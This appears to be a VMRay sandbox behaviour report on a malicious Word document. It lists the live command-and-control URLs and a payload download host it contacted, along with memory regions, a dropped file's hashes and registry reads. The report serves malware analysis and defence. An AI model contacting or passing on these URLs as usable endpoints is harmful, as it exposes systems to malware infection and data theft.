Word Doc. Drops Context Aware Payload | Grouped Behavior
Try VMRay Analyzer
|
The sample contacted only unknown URLs. |
| URL | Connection Successful | Reputation Status |
|---|---|---|
| 89.231.13.38/kas23/AUFDDCNTXWT_W617601.2B0207B83DB3421BDB30AED0283B84A5/0/Windows 7 x64 SP1/1031/87.142.156.87/4E7D329059DDCB1E5EC37D3CBBDFA46E247E2279DF57EA2055D11096E05BBEDA/ChqJujn6xjr2PYFE7lelOT6D/ |
|
Unknown
|
| 212.38.166.20/kas23/AUFDDCNTXWT_W617601.2B0207B83DB3421BDB30AED0283B84A5/5/systeminfo64/ |
|
Unknown
|
| www.events4u.cz/kas23.png |
|
Unknown
|
| 89.231.13.38/kas23/AUFDDCNTXWT_W617601.2B0207B83DB3421BDB30AED0283B84A5/5/spk/ |
|
Unknown
|
| myexternalip.com/raw |
|
Unknown
|
| Hostname | IP Addresses | Country | City | Protocols | Has Blacklisted URL |
|---|---|---|---|---|---|
| www.events4u.cz | 93.185.102.11 | CZ | HTTP, DNS, TCP |
|
|
| myexternalip.com | 78.47.139.102 | DE | HTTP, TCP |
|
|
| 89.231.13.38 | PL | HTTP, TCP |
|
||
| 212.38.166.20 | GB | HTTP, TCP |
|
| Information | Value |
|---|---|
| ID | #1 |
| File Name | c:\program files\microsoft office\office15\winword.exe |
| Command Line | "C:\Program Files\Microsoft Office\Office15\WINWORD.EXE" |
| Initial Working Directory | C:\Users\aDU0VK IWA5kLS\Desktop\ |
| Monitor | Start Time: 00:00:20, Reason: Analysis Target |
| Unmonitor | End Time: 00:02:26, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:06 |
| Information | Value |
|---|---|
| PID | 0x914 |
| Parent PID | 0x568 (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | AUFDDCNTXWT\aDU0VK IWA5kLS |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
980
0x
97C
0x
978
0x
974
0x
970
0x
96C
0x
94C
0x
948
0x
944
0x
940
0x
93C
0x
918
0x
9CC
0x
9DC
0x
A14
0x
A80
|
| Name | Start VA | End VA | Type | Permissions | Monitored | Dump | YARA Match | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000040000 | 0x00040000 | 0x00043fff | Pagefile Backed Memory | Readable |
|
|
|
|
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | Readable |
|
|
|
|
| private_0x00000000000c0000 | 0x000c0000 | 0x000c0fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000000d0000 | 0x000d0000 | 0x000d1fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x00000000000e0000 | 0x000e0000 | 0x000e1fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000000f0000 | 0x000f0000 | 0x000f0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000100000 | 0x00100000 | 0x00100fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000110000 | 0x00110000 | 0x0011ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000120000 | 0x00120000 | 0x00150fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000160000 | 0x00160000 | 0x00161fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000170000 | 0x00170000 | 0x0026ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000270000 | 0x00270000 | 0x0036ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000370000 | 0x00370000 | 0x0037ffff | Private Memory |
|
|
|
|
|
| pagefile_0x0000000000380000 | 0x00380000 | 0x00386fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000390000 | 0x00390000 | 0x0039ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000003a0000 | 0x003a0000 | 0x003a1fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000003b0000 | 0x003b0000 | 0x003b1fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x00000000003c0000 | 0x003c0000 | 0x003c1fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000003d0000 | 0x003d0000 | 0x003d0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000003f0000 | 0x003f0000 | 0x003f0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000410000 | 0x00410000 | 0x00410fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000430000 | 0x00430000 | 0x00430fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000440000 | 0x00440000 | 0x0053ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000540000 | 0x00540000 | 0x0063ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000640000 | 0x00640000 | 0x0067ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000680000 | 0x00680000 | 0x00680fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000690000 | 0x00690000 | 0x0069ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000006a0000 | 0x006a0000 | 0x00827fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000830000 | 0x00830000 | 0x009b0fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x00000000009c0000 | 0x009c0000 | 0x01dbffff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000001dc0000 | 0x01dc0000 | 0x01e9efff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000001ea0000 | 0x01ea0000 | 0x01ea0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001eb0000 | 0x01eb0000 | 0x01ebffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001ed0000 | 0x01ed0000 | 0x01ed0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001ef0000 | 0x01ef0000 | 0x01ef0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001f10000 | 0x01f10000 | 0x01f10fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000001f30000 | 0x01f30000 | 0x01f30fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000001f40000 | 0x01f40000 | 0x01f44fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001f50000 | 0x01f50000 | 0x01f50fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001f60000 | 0x01f60000 | 0x01fdffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000001fe0000 | 0x01fe0000 | 0x01fe1fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000001ff0000 | 0x01ff0000 | 0x01ffffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000002000000 | 0x02000000 | 0x02000fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000002010000 | 0x02010000 | 0x02010fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000002020000 | 0x02020000 | 0x0211ffff | Private Memory | Readable, Writable |
|
|
|
|
| msxml6r.dll | 0x02120000 | 0x02120fff | Memory Mapped File | Readable |
|
|
|
|
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000008.db | 0x02130000 | 0x02156fff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000002160000 | 0x02160000 | 0x0225ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000002260000 | 0x02260000 | 0x02652fff | Pagefile Backed Memory | Readable |
|
|
|
|
| sortdefault.nls | 0x02660000 | 0x0292efff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000002930000 | 0x02930000 | 0x02930fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002940000 | 0x02940000 | 0x02940fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002960000 | 0x02960000 | 0x02960fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002980000 | 0x02980000 | 0x02980fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000029a0000 | 0x029a0000 | 0x029a0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002a20000 | 0x02a20000 | 0x02a20fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000002a30000 | 0x02a30000 | 0x02a30fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002a40000 | 0x02a40000 | 0x02a40fff | Private Memory | Readable, Writable |
|
|
|
|
| c_1255.nls | 0x02a50000 | 0x02a60fff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000002a90000 | 0x02a90000 | 0x02b8ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002b90000 | 0x02b90000 | 0x02c8ffff | Private Memory | Readable, Writable |
|
|
|
|
| kernelbase.dll.mui | 0x02c90000 | 0x02d4ffff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x0000000002d50000 | 0x02d50000 | 0x02e4ffff | Private Memory | Readable, Writable |
|
|
|
|
| segoeui.ttf | 0x02e50000 | 0x02ecefff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000002ee0000 | 0x02ee0000 | 0x02f5ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002f80000 | 0x02f80000 | 0x02f9efff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002fa0000 | 0x02fa0000 | 0x0309ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000030a0000 | 0x030a0000 | 0x0349ffff | Pagefile Backed Memory | Readable |
|
|
|
|
| staticcache.dat | 0x034a0000 | 0x03dcffff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000003dd0000 | 0x03dd0000 | 0x03ecffff | Private Memory | Readable, Writable |
|
|
|
|
| seguisb.ttf | 0x03ed0000 | 0x03f33fff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000003fb0000 | 0x03fb0000 | 0x03fbffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000003fc0000 | 0x03fc0000 | 0x040bffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000004160000 | 0x04160000 | 0x041dffff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| private_0x0000000004260000 | 0x04260000 | 0x0435ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000043c0000 | 0x043c0000 | 0x043cffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000043d0000 | 0x043d0000 | 0x044cffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000045c0000 | 0x045c0000 | 0x045cffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000045d0000 | 0x045d0000 | 0x04dcffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000004dd0000 | 0x04dd0000 | 0x04ecffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000004f30000 | 0x04f30000 | 0x0502ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000005030000 | 0x05030000 | 0x0522ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000005270000 | 0x05270000 | 0x0536ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000054f0000 | 0x054f0000 | 0x055effff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000055f0000 | 0x055f0000 | 0x065effff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x00000000066d0000 | 0x066d0000 | 0x0674ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000067d0000 | 0x067d0000 | 0x0684ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000006930000 | 0x06930000 | 0x069affff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000069b0000 | 0x069b0000 | 0x06daffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000006db0000 | 0x06db0000 | 0x071affff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000071b0000 | 0x071b0000 | 0x079affff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000079b0000 | 0x079b0000 | 0x07db0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000007dc0000 | 0x07dc0000 | 0x081c0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000081d0000 | 0x081d0000 | 0x085d0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000085e0000 | 0x085e0000 | 0x087dffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000087e0000 | 0x087e0000 | 0x08fdffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000008fe0000 | 0x08fe0000 | 0x0949ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000094a0000 | 0x094a0000 | 0x0989ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000037440000 | 0x37440000 | 0x3744ffff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| msvcp100.dll | 0x73d80000 | 0x73e17fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msvcr100.dll | 0x73e20000 | 0x73ef1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| osppc.dll | 0x74be0000 | 0x74c12fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernel32.dll | 0x77320000 | 0x7743efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| user32.dll | 0x77440000 | 0x77539fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x77540000 | 0x776e8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| psapi.dll | 0x77710000 | 0x77716fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
|
| winword.exe | 0x13f200000 | 0x13f3d7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x000007febef30000 | 0x7febef30000 | 0x7febef3ffff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| riched20.dll | 0x7fee90a0000 | 0x7fee92c2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| dwrite.dll | 0x7fee9510000 | 0x7fee968dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msores.dll | 0x7fee9690000 | 0x7feee37afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| mso.dll | 0x7feee380000 | 0x7fef0630fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wwlib.dll | 0x7fef0640000 | 0x7fef20befff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| adal.dll | 0x7fef20f0000 | 0x7fef21c8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| d3d10warp.dll | 0x7fef21d0000 | 0x7fef239ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msointl.dll | 0x7fef23a0000 | 0x7fef2716fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| oart.dll | 0x7fef2720000 | 0x7fef3b33fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| mscoreei.dll | 0x7fef3d20000 | 0x7fef3db8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| d3d11.dll | 0x7fef3dc0000 | 0x7fef3e85fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msptls.dll | 0x7fef3e90000 | 0x7fef4005fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| d2d1.dll | 0x7fef4010000 | 0x7fef40f1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msohev.dll | 0x7fef4280000 | 0x7fef429bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| mscoree.dll | 0x7fef42a0000 | 0x7fef430efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wwintl.dll | 0x7fef4310000 | 0x7fef43e3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msimg32.dll | 0x7fef43f0000 | 0x7fef43f6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msxml6.dll | 0x7fef79d0000 | 0x7fef7bc1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| winspool.drv | 0x7fef7c60000 | 0x7fef7cd0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| office.odf | 0x7fef94a0000 | 0x7fef999ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msi.dll | 0x7fef99a0000 | 0x7fef9cb5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| dxgi.dll | 0x7fefa130000 | 0x7fefa1d6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| d3d10_1core.dll | 0x7fefa1e0000 | 0x7fefa234fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| d3d10_1.dll | 0x7fefa240000 | 0x7fefa273fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| webio.dll | 0x7fefa500000 | 0x7fefa563fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| winhttp.dll | 0x7fefa570000 | 0x7fefa5e0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| windowscodecs.dll | 0x7fefad90000 | 0x7fefaeb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| dwmapi.dll | 0x7fefaec0000 | 0x7fefaed7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| gdiplus.dll | 0x7fefb080000 | 0x7fefb294fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| uxtheme.dll | 0x7fefb2a0000 | 0x7fefb2f5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wtsapi32.dll | 0x7fefb950000 | 0x7fefb960fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntmarta.dll | 0x7fefbde0000 | 0x7fefbe0cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| propsys.dll | 0x7fefbe40000 | 0x7fefbf6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| comctl32.dll | 0x7fefbfc0000 | 0x7fefc1b3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| version.dll | 0x7fefc650000 | 0x7fefc65bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rsaenh.dll | 0x7fefca60000 | 0x7fefcaa6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
|
For performance reasons, the remaining 200 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\adu0vk~1\appdata\local\temp\~dfd532346fbcb353e3.tmp | 0.50 KB (512 bytes) |
MD5:
bf619eac0cdf3f68d496ea9344137e8b
SHA1: 5c3eb80066420002bc3dcc7ca4ab6efad7ed4ae5 SHA256: 076a27c79e5ace2a3d47f9dd2e83e4ff6ea8872b3c2218f66c92b89b55f36560 |
|
|
| Operation | Class | Interface | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Create | C62A69F0-16DC-11CE-9E98-00AA00574A4F | 00000001-0000-0000-C000-000000000046 | cls_context = CLSCTX_INPROC_SERVER, CLSCTX_INPROC_HANDLER |
|
1 |
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CLASSES_ROOT\Licenses |
|
1 | ||
| Open Key | HKEY_CLASSES_ROOT\TypeLib |
|
1 | ||
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} |
|
1 | ||
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.6 |
|
1 | ||
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.6\409 |
|
2 | ||
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.6\9 |
|
2 | ||
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.6\0 |
|
2 | ||
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.6\0\win64 |
|
1 | ||
| Open Key | HKEY_CLASSES_ROOT\TypeLib |
|
2 | ||
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} |
|
1 | ||
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0 |
|
1 | ||
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0 |
|
2 | ||
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64 |
|
1 | ||
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} |
|
1 | ||
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.7 |
|
1 | ||
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.7\0 |
|
2 | ||
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.7\0\win64 |
|
1 | ||
| Open Key | HKEY_CLASSES_ROOT\TypeLib |
|
5 | ||
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{000204EF-0000-0000-C000-000000000046} |
|
1 | ||
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{000204EF-0000-0000-C000-000000000046}\4.2 |
|
1 | ||
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{000204EF-0000-0000-C000-000000000046}\4.2\9 |
|
2 | ||
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{000204EF-0000-0000-C000-000000000046}\4.2\9\win64 |
|
1 | ||
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} |
|
1 | ||
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.6 |
|
1 | ||
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.6\0 |
|
2 | ||
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.6\0\win64 |
|
1 | ||
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} |
|
1 | ||
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0 |
|
1 | ||
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0 |
|
2 | ||
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64 |
|
1 | ||
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} |
|
1 | ||
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.7 |
|
1 | ||
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.7\0 |
|
2 | ||
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.7\0\win64 |
|
1 | ||
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{0D452EE1-E08F-101A-852E-02608C4D0BB4} |
|
1 | ||
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{0D452EE1-E08F-101A-852E-02608C4D0BB4}\2.0 |
|
1 | ||
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{0D452EE1-E08F-101A-852E-02608C4D0BB4}\2.0\0 |
|
2 | ||
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{0D452EE1-E08F-101A-852E-02608C4D0BB4}\2.0\0\win64 |
|
1 | ||
| Open Key | HKEY_CLASSES_ROOT\CLSID\{C62A69F0-16DC-11CE-9E98-00AA00574A4F}\DesignerFeatures |
|
1 | ||
| Open Key | HKEY_CLASSES_ROOT\Clsid\{C62A69F0-16DC-11CE-9E98-00AA00574A4F}\InprocServer32 |
|
1 | ||
| Open Key | HKEY_CLASSES_ROOT\TypeLib |
|
1 | ||
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} |
|
1 | ||
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.6 |
|
1 | ||
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.6\0 |
|
2 | ||
| Open Key | HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.6\0\win64 |
|
1 | ||
| Open Key | HKEY_CLASSES_ROOT\Clsid\{82B02373-B5BC-11CF-810F-00A0C9030074} |
|
1 | ||
| Open Key | HKEY_CLASSES_ROOT\Clsid\{82B02373-B5BC-11CF-810F-00A0C9030074}\Control |
|
1 | ||
| Open Key | HKEY_CLASSES_ROOT\Clsid\{82B02373-B5BC-11CF-810F-00A0C9030074}\Insertable |
|
1 | ||
| Open Key | HKEY_CLASSES_ROOT\Clsid\{82B02374-B5BC-11CF-810F-00A0C9030074} |
|
1 | ||
| Open Key | HKEY_CLASSES_ROOT\Clsid\{82B02374-B5BC-11CF-810F-00A0C9030074}\Control |
|
1 | ||
| Open Key | HKEY_CLASSES_ROOT\Clsid\{82B02374-B5BC-11CF-810F-00A0C9030074}\Insertable |
|
1 | ||
| Open Key | HKEY_CLASSES_ROOT\Clsid\{82B02375-B5BC-11CF-810F-00A0C9030074} |
|
1 | ||
| Open Key | HKEY_CLASSES_ROOT\Clsid\{82B02375-B5BC-11CF-810F-00A0C9030074}\Control |
|
1 | ||
| Open Key | HKEY_CLASSES_ROOT\Clsid\{82B02375-B5BC-11CF-810F-00A0C9030074}\Insertable |
|
1 | ||
| Open Key | HKEY_CLASSES_ROOT\Clsid\{8A683C92-BA84-11CF-8110-00A0C9030074} |
|
1 | ||
| Open Key | HKEY_CLASSES_ROOT\Clsid\{8A683C92-BA84-11CF-8110-00A0C9030074}\Control |
|
1 | ||
| Open Key | HKEY_CLASSES_ROOT\Clsid\{8A683C92-BA84-11CF-8110-00A0C9030074}\Insertable |
|
1 | ||
| Open Key | HKEY_CLASSES_ROOT\Clsid\{8A683C93-BA84-11CF-8110-00A0C9030074} |
|
1 | ||
| Open Key | HKEY_CLASSES_ROOT\Clsid\{8A683C93-BA84-11CF-8110-00A0C9030074}\Control |
|
1 | ||
| Open Key | HKEY_CLASSES_ROOT\Clsid\{8A683C93-BA84-11CF-8110-00A0C9030074}\Insertable |
|
1 | ||
| Open Key | HKEY_CLASSES_ROOT\Clsid\{1C3B4210-F441-11CE-B9EA-00AA006B1A69} |
|
1 | ||
| Open Key | HKEY_CLASSES_ROOT\Clsid\{1C3B4210-F441-11CE-B9EA-00AA006B1A69}\Control |
|
1 | ||
| Open Key | HKEY_CLASSES_ROOT\Clsid\{1C3B4210-F441-11CE-B9EA-00AA006B1A69}\Insertable |
|
1 | ||
| Open Key | HKEY_CLASSES_ROOT\Clsid\{909E0AE0-16DC-11CE-9E98-00AA00574A4F} |
|
1 | ||
| Open Key | HKEY_CLASSES_ROOT\Clsid\{909E0AE0-16DC-11CE-9E98-00AA00574A4F}\Control |
|
1 | ||
| Open Key | HKEY_CLASSES_ROOT\Clsid\{909E0AE0-16DC-11CE-9E98-00AA00574A4F}\Insertable |
|
1 | ||
| Open Key | HKEY_CLASSES_ROOT\Clsid\{AFC20920-DA4E-11CE-B943-00AA006887B4} |
|
1 | ||
| Open Key | HKEY_CLASSES_ROOT\Clsid\{AFC20920-DA4E-11CE-B943-00AA006887B4}\Control |
|
1 | ||
| Open Key | HKEY_CLASSES_ROOT\Clsid\{AFC20920-DA4E-11CE-B943-00AA006887B4}\Insertable |
|
1 | ||
| Open Key | HKEY_CLASSES_ROOT\Clsid\{5CEF5610-713D-11CE-80C9-00AA00611080} |
|
1 | ||
| Open Key | HKEY_CLASSES_ROOT\Clsid\{5CEF5610-713D-11CE-80C9-00AA00611080}\Control |
|
1 | ||
| Open Key | HKEY_CLASSES_ROOT\Clsid\{5CEF5610-713D-11CE-80C9-00AA00611080}\Insertable |
|
1 | ||
| Read Value | HKEY_CLASSES_ROOT\Licenses\8804558B-B773-11d1-BC3E-0000F87552E7 | data = } |
|
1 | |
